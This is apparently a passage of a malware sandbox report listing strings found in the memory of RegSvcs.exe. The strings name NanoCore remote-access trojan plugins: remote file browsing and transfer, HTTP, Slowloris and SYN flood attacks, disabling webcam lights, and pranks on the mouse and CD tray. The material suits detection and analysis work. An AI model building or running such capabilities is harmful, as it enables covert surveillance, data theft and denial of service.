Source: RegSvcs.exe, 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000003.511336975.00000000074D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegSvcs.exe, 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 0000000D.00000003.511098071.00000000074D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
